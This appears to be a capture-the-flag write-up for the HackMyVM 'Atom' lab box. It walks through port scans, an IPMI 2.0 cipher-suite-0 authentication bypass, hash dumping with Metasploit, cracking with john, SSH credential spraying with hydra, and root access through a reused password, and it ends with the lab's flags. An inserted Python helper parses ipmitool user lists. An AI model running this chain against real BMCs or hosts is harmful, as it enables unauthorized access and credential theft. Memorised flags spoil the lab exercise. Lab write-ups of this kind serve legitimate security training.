Nmap Results
ℹ️ I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access.
TCP Scan
# Nmap 7.94SVN scan initiated Fri Aug 16 14:34:24 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.11
Nmap scan report for 10.9.9.11
Host is up (0.00047s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_ 256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 16 14:34:26 2024 -- 1 IP address (1 host up) scanned in 1.81 seconds
ℹ️ Since only tcp/22 is open, I'm going to try a UDP scan as well. SSH is almost never the first way into a box.
UDP Scan
# Nmap 7.94SVN scan initiated Fri Aug 16 14:34:32 2024 as: nmap -Pn --top-ports 300 -sU -T4 -oN udp-nmap-scan.txt 10.9.9.11
Warning: 10.9.9.11 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.9.9.11
Host is up (0.00080s latency).
Not shown: 283 closed udp ports (port-unreach)
PORT STATE SERVICE
623/udp open asf-rmcp
# Nmap done at Fri Aug 16 14:39:31 2024 -- 1 IP address (1 host up) scanned in 299.34 seconds
Service Enumeration
UDP/623
IPMI Vulnerabilities
IPMI 2.0 has a well-known authentication flaw, uncovered by Dan Farmer, in cipher suite 0. Negotiating cipher suite 0 tells the BMC to skip authentication, so any password is accepted as long as the username exists (see Dan Farmer's research for the full write-up). He found the same behaviour on BMCs from HP, Dell and Supermicro, which suggests a problem common to IPMI 2.0 implementations in general rather than a single vendor's firmware.
Testing IPMI
💡 Again, we can authenticate to the IPMI server with any password, given that a username is valid.
Pulling Info from IPMI
ipmitool -I lanplus -C 0 -H 10.9.9.11 -U admin -P thisisnotthepassword user list
Usernames from IPMI
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 true false false Unknown (0x00)
2 admin true false true ADMINISTRATOR
3 analiese true false true USER
4 briella true false true USER
5 richardson true false true USER
6 carsten true false true USER
7 sibylle true false true USER
8 wai-ching true false true USER
9 jerrilee true false true USER
10 glynn true false true USER
11 asia true false true USER
12 zaylen true false true USER
13 fabien true false true USER
14 merola true false true USER
15 jem true false true USER
16 riyaz true false true USER
17 laten true false true USER
18 cati true false true USER
19 rozalia true false true USER
20 palmer true false true USER
21 onida true false true USER
22 terra true false true USER
23 ranga true false true USER
24 harrie true false true USER
25 pauly true false true USER
26 els true false true USER
27 bqb true false true USER
28 karlotte true false true USER
29 zali true false true USER
30 ende true false true USER
31 stacey true false true USER
32 shirin true false true USER
33 kaki true false true USER
34 saman true false true USER
35 kalie true false true USER
36 deshawn true false true USER
37 mayeul true false true USER
38 true false false Unknown (0x00)
39 true false false Unknown (0x00)
40 true false false Unknown (0x00)
41 true false false Unknown (0x00)
42 true false false Unknown (0x00)
43 true false false Unknown (0x00)
44 true false false Unknown (0x00)
45 true false false Unknown (0x00)
46 true false false Unknown (0x00)
47 true false false Unknown (0x00)
48 true false false Unknown (0x00)
49 true false false Unknown (0x00)
50 true false false Unknown (0x00)
51 true false false Unknown (0x00)
52 true false false Unknown (0x00)
53 true false false Unknown (0x00)
54 true false false Unknown (0x00)
55 true false false Unknown (0x00)
56 true false false Unknown (0x00)
57 true false false Unknown (0x00)
58 true false false Unknown (0x00)
59 true false false Unknown (0x00)
60 true false false Unknown (0x00)
61 true false false Unknown (0x00)
62 true false false Unknown (0x00)
63 true false false Unknown (0x00)
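As an added example (not part of the original writeup), here is a small Python audit helper that parses `ipmitool user list` output and reports which named, IPMI-enabled slots exist and which of them hold ADMINISTRATOR privilege; on a BMC that accepts cipher suite 0, every name in that list is a working login. The sample input is a constructed, abridged copy of the listing above.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Row shape of `ipmitool user list`: the name column is blank for unused
# slots, and the privilege column may contain spaces ("Unknown (0x00)").
ROW_RE = re.compile(
    r"^\s*(\d+)\s+(?:(\S+)\s+)?(true|false)\s+(true|false)\s+(true|false)\s+(.+?)\s*$"
)

@dataclass
class BmcUser:
    uid: int
    name: str          # "" for an unused slot
    callin: bool
    link_auth: bool
    ipmi_msg: bool     # True means the slot may send IPMI messages over LAN
    priv: str          # ADMINISTRATOR / OPERATOR / USER / "Unknown (0x00)"

def parse_user_list(text: str) -> list[BmcUser]:
    users = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:          # header line or blank line
            continue
        uid, name, callin, link, msg, priv = m.groups()
        users.append(BmcUser(int(uid), name or "", callin == "true",
                             link == "true", msg == "true", priv))
    return users

def audit_user_list(text: str) -> dict:
    """Summarise the exposure of a BMC user table: every named slot with IPMI
    messaging enabled is a valid login name, and each ADMINISTRATOR slot
    gives full control of the BMC."""
    users = parse_user_list(text)
    reachable = [u for u in users if u.name and u.ipmi_msg]
    return {
        "slots": len(users),
        "reachable": [u.name for u in reachable],
        "admins": [u.name for u in reachable if u.priv == "ADMINISTRATOR"],
        "unused": [u.uid for u in users if not u.name],
    }

# Constructed sample: an abridged copy of the listing shown above.
SAMPLE = """\
ID  Name        Callin  Link Auth  IPMI Msg  Channel Priv Limit
1               true    false      false     Unknown (0x00)
2   admin       true    false      true      ADMINISTRATOR
3   analiese    true    false      true      USER
21  onida       true    false      true      USER
38              true    false      false     Unknown (0x00)
"""

if __name__ == "__main__":
    print(audit_user_list(SAMPLE))
```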
Pulling Hashes from IPMI
sudo msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS 10.9.9.11
set USERS_FILE usernames.txt
set OUTPUT_JOHN_FILE /home/ben/Pentest/Training/HackMyVM/Atom/hash
run
john --wordlist=rockyou.txt hash
TCP/22
hydra -I -v -C creds.txt ssh://10.9.9.11
Exploit
IPMI Protocol and Weak Passwords
The BMC on the target runs a vulnerable IPMI 2.0 implementation that lets us authenticate as any valid user without knowing the password. With that session we can dump the password hashes of the enumerated users and crack any whose password appears in a wordlist.
ssh onida@10.9.9.11
Post-Exploit Enumeration
Operating Environment
OS & Kernel
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
VERSION_CODENAME=bookworm
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
Linux atom 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64 GNU/Linux
Current User
uid=1000(onida) gid=1000(onida) groups=1000(onida),100(users)
sudo command not found
Users and Groups
Local Users
onida:x:1000:1000:,,,:/home/onida:/bin/bash
Local Groups
users:x:100:onida
onida:x:1000:
Network Configurations
Network Interfaces
2: ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether bc:24:11:6e:ab:9b brd ff:ff:ff:ff:ff:ff
altname enp0s18
inet 10.9.9.11/24 brd 10.9.9.255 scope global dynamic noprefixroute ens18
valid_lft 6279sec preferred_lft 6279sec
inet6 fe80::889f:b1c2:3dfc:3d93/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:48:1f:93:dd brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:48ff:fe1f:93dd/64 scope link
valid_lft forever preferred_lft forever
Open Ports
tcp LISTEN 0 4096 127.0.0.1:43749 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:80 0.0.0.0:*
Interesting Files
/var/www/html/atom-2400-database.db
sqlite3 /var/www/html/atom-2400-database.db
sqlite3> .tables
select * from users;
1|atom|$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm
Privilege Escalation
Cracking the User Hash
Becoming Root
💡 There is no atom user on the box when checking /etc/passwd, so let's see if this password is also re-used for root.
su root
Flags
User
f75390001fa2fe806b4e3f1e5dadeb2b
Root
d3a4fd660f1af5a7e3c2f17314f4a962